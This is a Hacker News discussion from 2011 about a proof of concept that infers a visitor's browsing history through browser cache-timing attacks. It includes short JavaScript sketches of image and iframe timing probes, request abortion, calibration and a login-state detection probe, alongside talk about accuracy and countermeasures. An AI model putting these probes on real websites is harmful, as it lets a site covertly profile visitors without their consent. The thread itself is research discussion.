Hacker News
I know the websites you visited (coredump.cx)
84 points by ksri on Dec 3, 2011 | 46 comments

Thanks for all the insightful comments about how this "didn't work for you" or "I'm paranoid so I survived this".

It works. It works enough of the time and on enough browsers to be very relevant to anyone who cares about the privacy/security of internet users at large.

This is an impressive proof of concept, and an important thing to be discussing, yeah?

[EDIT] To clarify, I tested this on Firefox 8.0.1 on my 2011 iMac with Lion and it worked flawlessly: as I visited Facebook, Reddit, and Flickr one by one, each turned from gray to green in the subsequent test.

I don't know if it's accurate enough to be a concern. What could an attacker do with such information that is so scary? They could publish "IP address X has been to Y, Z, and W recently", or they could use it to target ads, I guess, but it doesn't seem like it's reliable enough to cause any serious harm. You could just say, "Um, no I haven't" if it becomes an issue.

It did correctly detect some sites for me, but it gave one false positive and three false negatives. With that kind of error rate I just don't see it being taken seriously in anything that matters.

You are a sample size of 1.

Read the rest of the comments here. Everyone else is having similar problems. Also, please spare me the expected "This is all anecdotal/sample size of 30" follow-up. Perhaps you can answer the real question -- is this valuable to anyone if it has a significant error margin? I think it wouldn't be allowed a margin of more than 1% if it were to be useful, and even that is kind of pushing it if you intend to do anything important with the data -- if 20 sites are tested per visitor, a 1% error rate would mean that an incorrect detection would occur every fifth visitor or so. That's enough to allow plausible deniability in my book.

FWIW, I added several improvements, and according to the built-in survey, it works for about 95% of all visitors. If you had bad results initially, clear your cache and give it a second try.

Exactly. It's a matter of spending a few hours per browser to perfect it. For all we know, someone may already have perfected it and could be using this in the wild.

Very simple summary of the technique:

To test if a user has recently visited Facebook, see how long it takes for the Facebook logo to load when called from your own page. If it's relatively fast, you can assume the image has been cached by the user's browser ... meaning the user has recently visited Facebook. If it's relatively slow, you can assume no cached version of the logo is available, so the user probably hasn't visited Facebook recently.

Results are fuzzy because "relatively fast" and "relatively slow" are not precise.
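A minimal sketch of that naive img-based probe might look like the following. The fixed threshold and the example logo URL are illustrative assumptions on my part; a real attack would need per-client calibration, and (as the author notes below) this approach has serious limitations:

```javascript
// Naive cache-timing probe via an image load (a sketch of the commonly
// suggested <img> approach, not the PoC's actual method).
// THRESHOLD_MS is an illustrative guess, not a calibrated value.
const THRESHOLD_MS = 50;

// Pure decision logic: a "fast" load suggests the resource was cached.
function classifyLoadTime(elapsedMs, thresholdMs) {
  return elapsedMs < thresholdMs ? "probably cached" : "probably not cached";
}

// Browser-only part: time how long a well-known logo takes to load.
function probeImage(url, callback) {
  const img = new Image();
  const start = Date.now();
  img.onload = img.onerror = function () {
    callback(classifyLoadTime(Date.now() - start, THRESHOLD_MS));
  };
  img.src = url; // note: this load itself pollutes the cache for next time
}

// Hypothetical usage, e.g.:
// probeImage("https://www.facebook.com/images/some_logo.png", console.log);
```

One inherent drawback, visible in the last comment: once the probe completes, the image is cached, so repeat probes against the same visitor give false positives unless the request is aborted early.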

Author here. It's not exactly that; the <img> approach is commonly suggested, but it has some serious limitations (explained in the source code).

Instead, I time <iframe>s, which allows SOP violations to be trapped the moment the browser barely starts thinking about rendering the target page. The other benefit is that <iframe> requests can be aborted quite easily when they are taking long enough for us to suspect a cache miss - before the request is completed and cached.

The results should not be fuzzy, although the PoC uses hardcoded timings instead of doing calibration, which makes it a bit tricky with "outlier" clients (very fast or very slow).
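A rough sketch of the iframe idea as described here (not the PoC's actual source - the polling mechanism, hardcoded budget, and function names are my own illustrative assumptions):

```javascript
// Sketch of the <iframe>-based probe described above. ABORT_AFTER_MS is an
// illustrative hardcoded timing, standing in for the PoC's calibration.
const ABORT_AFTER_MS = 30;

// Pure decision logic: activity within the budget suggests a cached copy.
function decide(sawActivityInTime) {
  return sawActivityInTime ? "cache hit" : "cache miss";
}

// Browser-only: point a hidden iframe at the target and poll for the SOP
// violation that occurs once the cross-origin page begins to load.
function probeIframe(url, callback) {
  const frame = document.createElement("iframe");
  frame.style.display = "none";
  document.body.appendChild(frame);
  frame.src = url;
  const start = Date.now();
  const poll = setInterval(function () {
    let crossOriginNow = false;
    try {
      // While the frame still shows about:blank, this access succeeds;
      // it throws as soon as the cross-origin document starts rendering.
      void frame.contentDocument.location.href;
    } catch (e) {
      crossOriginNow = true;
    }
    if (crossOriginNow) {
      clearInterval(poll);
      callback(decide(true));            // target appeared within budget
    } else if (Date.now() - start > ABORT_AFTER_MS) {
      clearInterval(poll);
      frame.src = "about:blank";         // abort before the response completes
      callback(decide(false));           // ...so it never lands in the cache
    }
  }, 1);
}
```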

I made some minor tweaks today, and the success rate should be greatly improved; there's now a mini-survey on the page, looks like ~90% of the people who bother to complete it are getting accurate results.

Seems like a good way to calibrate is to have the client cache a file from your targets list (you can cachebust by adding "?some_random_junk" at the end). Then, see how long it takes to get a hit.

Better yet, do this for each target URL. Knowing the time that a miss takes vs. a hit will greatly increase your accuracy.
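The calibration idea above could be sketched like so; the helper names and the 50% cutoff are my own illustrative choices, not anything from the PoC:

```javascript
// Per-target calibration sketch: force a guaranteed cache miss by appending
// random junk to the query string, time it, and treat anything much faster
// than that as a hit. MISS_FRACTION is an illustrative guess.
const MISS_FRACTION = 0.5;

// Derive a hit/miss threshold from the measured miss time.
function thresholdFromMiss(missMs, fraction) {
  return missMs * fraction;
}

// Cache-bust a URL so the browser cannot serve it from cache.
function cacheBust(url) {
  const sep = url.indexOf("?") === -1 ? "?" : "&";
  return url + sep + "junk=" + Math.random().toString(36).slice(2);
}

// Hypothetical flow (browser-only timing omitted):
//   1. time a load of cacheBust(targetUrl)      -> missMs
//   2. threshold = thresholdFromMiss(missMs, MISS_FRACTION)
//   3. time a load of targetUrl; below threshold -> cache hit
```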

If it loads the page in an iframe, wouldn't future loads give a false positive?

Also, does this work for Google+ (I don't have an account)? I'd be surprised if it did, since it uses X-Frame-Options.

If you allow the load to complete, yes. But the idea here is to very quickly decide that you're not getting a cached copy, and abort the request (by changing src=) before the browser has a chance to read anything back and figure out what to do with it.

It is missing some sites which have https-everywhere rules. Still a scary thing; looking at the comments in the source, would coalescing load events deter the attack, or at least make it probabilistic and slow? And why isn't Firefox displaying requests to the sniffed sites while it attempts to access them? The request is already issued, even if the script manages to abort it before it completes.

Let's hope it doesn't attract the typical browser developers' slapdash response of "let's fix this by breaking the DOM," as happened with the :visited trick.

Seemed like they fixed :visited as best they could. What would you have done?

I accidentally fireproofed myself against this attack. I have the Web Developer extension installed and I forgot I had the Disable Cache option on. (The script works as advertised with it off.) Not a really practical solution if you want pages to load fast.

The conventional wisdom is that you need a web cache for a fast browsing experience. I disabled mine completely a few months ago and can't tell the difference under normal usage. Try it, you'll be surprised.

As it turns out, I'm one of the minority of users who keep NoScript in paranoid mode until I really want to see something supplied by JS -- and then I'm likely to only give temporary permission and turn that off when I'm done.

Obviously, this didn't work against me.

Same here. I enabled it after reading the code and it detected Facebook and G+. The latter is possible (links from HN), but I never go to the former. It also failed to detect some of the others.

Why the need for a "sub-ms" timer implementation? Just do a while loop and constantly check for the SOP exception (or for X ms to have elapsed). Set a timeout between checking URLs. The ~10ms blocking of each URL check will not be noticeable to the UI.

Nice PoC though, and thanks for the lack of press release ;)

Edit: I just tried this out and it appears that the looping JS blocks the iframe from loading. I would have figured the iframe would be a separate JS thread. I'm wondering -- do all iframes share the same JS thread? Can one iframe block another? Anyway, it's clear that some sort of asynchronous solution is necessary.

Chiefly because if you have a fast machine, good connection, and a nearby CDN node, ~10 ms may be enough to establish a connection, make a request, and see the response.

Plus, if you do setInterval(..., 1) and then measure new Date().getTime() deltas, you will probably see that even if the browser isn't doing anything taxing, you get 100 ms or more every now and then...
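That jitter is easy to observe; here is a small helper for computing the gaps between timer ticks (names are mine, usable in both browser and Node):

```javascript
// Compute the gaps between successive timer ticks. With setInterval(fn, 1)
// you would hope for ~1 ms gaps, but timer clamping and scheduling jitter
// produce occasional much larger deltas - which ruins naive timing probes.
function intervalDeltas(timestamps) {
  const deltas = [];
  for (let i = 1; i < timestamps.length; i++) {
    deltas.push(timestamps[i] - timestamps[i - 1]);
  }
  return deltas;
}

// Record `ticks` timestamps, then hand the deltas to `done` for inspection.
function measureJitter(ticks, done) {
  const stamps = [];
  const id = setInterval(function () {
    stamps.push(Date.now());
    if (stamps.length >= ticks) {
      clearInterval(id);
      done(intervalDeltas(stamps));
    }
  }, 1);
}
```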

I'm assuming there is someone working on JavaScript-RT as we speak, though ;-)

It reports completely bogus entries for me, sites which I never visit:

     Blogger - admin
     Google search (UK)
These are in addition to entries like Wikipedia, Google, Facebook, YouTube, LinkedIn, and Reddit, which most other people here are visiting.

If this is based on actual info taken from :visited selectors, apparently they are useless (maybe these are reported because of banners or scripts loaded from those sites or something?) and one could do a better job by just faking it.

If this is based on actual info taken from :visited selectors, apparently they are useless

It's not, it's based on trying to load some URL from the website and measuring the time it takes. If you went there, it should be in the cache and take much less time to load.

It doesn't seem to work that well, though.

If this is based on actual info taken from :visited selectors

Nope, that security hole was patched already. https://blog.mozilla.com/security/2010/03/31/plugging-the-cs...

People may be using it wrong. My browser cache clears on every exit (likely for most people at HN). I had a new session going, so it didn't detect where I went because there was no history. When I went on Facebook and tried it again, Facebook showed up. So the attack does work in some cases.

The one good thing that could come out of this is that websites with the giant bar of "follow me/like me" icons could size them differently based on whether they detect that the user has visited a certain social media site.

Clearing your cache between sessions is not good enough. Just disable your cache altogether. It works better than you'd expect.

Oddly, it detected some sites I've never been to (they aren't in my history). They don't seem to be in my cache or loaded via adverts either. Some others I went to were detected, but..

Maybe you just have a really fast internet connection?

The webtiming paper provides more information on this form of attack - http://sip.cs.princeton.edu/pub/webtiming.pdf

The summary of the paper makes me sad: "We are not aware of any practical countermeasures to these attacks. There seems to be little hope that effective countermeasures will be developed and deployed any time soon."

The countermeasure is trivial: single-origin policy or origin management for cache access, at the slight expense of slower browsing when visiting evil websites.

Countermeasures don't appear to be all that necessary, if the attack itself is ineffective. The results seem to be quite random, placing me at sites I've never been on and not noticing ones that I do visit regularly, such as Twitter and Facebook.

Install RequestPolicy. It fixes this problem and many many more.

Didn't work in Firefox 8.0.1

I'm getting almost random results in FF8. It differs quite a lot when comparing multiple runs.

I'm more surprised that it thinks that I've logged into blogger (which I've never done on this computer) than that it misses my one-page visit to reddit about a week ago. And on the next round the results are reversed.

Try the original: http://lcamtuf.coredump.cx/cachetime/orig.html

It worked for me on Chrome. The one linked now gives some weird entries.

Still doesn't get through NoScript.

Very random results. I used this on Firefox (beta nightly) and on a fresh start got no entries. When I opened Facebook in another tab then quickly ran again, it said I had gone to Facebook, Twitter and Blogger. When I retried, just Facebook. It also said I went to almost all the eCommerce websites without me having visited any.

The firefox version from the tor browser bundle does not seem to be vulnerable to this attack.

Of course. It shouldn't be caching anything to disk.

Or even RAM?

I have largely varying results in FF9.

The idea is interesting but, considering that the performance of the client machine can affect the results, it doesn't feel very viable.

What about DNS cache probing? Is it possible? I guess it will suffer from similar results but at smaller scale.

The old script works better for me. Fewer false positives and fairly stable results.

It got just YouTube right for me. Considering the websites it says you might have visited, there's a high probability of getting at least some right, because a large population on the internet visits those sites. Looks bogus to me!

Just give it a try: I had visited none of these websites before checking, and it got that right; then I opened Amazon, Twitter, ... and they were detected perfectly!

I opened twitter. And now it thinks I visited youtube for some reason :-/

This is on Firefox 8.0 on Fedora Linux. Maybe the OS has a lot to do with the success rate?

Edit: I just read through the technique now and there's no way it could depend on the OS. Anyway, this is way too inaccurate to be of any practical use.

Just to be precise: I'm on Arch Linux (up to date) / Firefox 8.0.

You can also use the same method (or a similar one) to check whether a user is logged in to third-party websites.
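For completeness, the classic login-detection variant relies less on timing than on loading a resource that is only served to authenticated users. A hedged sketch - the idea that the target serves an image only to logged-in users (redirecting others to a login page) is an assumption about a hypothetical site, not something from this PoC:

```javascript
// Login-state probe sketch (a related technique, not this page's code).
// Many sites serve some resource only to logged-in users; loading such a
// URL as an <img> and watching onload vs. onerror leaks the login state.

// Pure interpretation logic: a successful load of an auth-only resource
// suggests the user holds a valid session with that site.
function interpret(loaded) {
  return loaded ? "probably logged in" : "probably logged out";
}

// Browser-only: probe a hypothetical authenticated-only image URL.
function probeLogin(authOnlyImageUrl, callback) {
  const img = new Image();
  img.onload = function () { callback(interpret(true)); };
  img.onerror = function () { callback(interpret(false)); };
  img.src = authOnlyImageUrl; // e.g. an avatar URL that 302s to login otherwise
}
```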

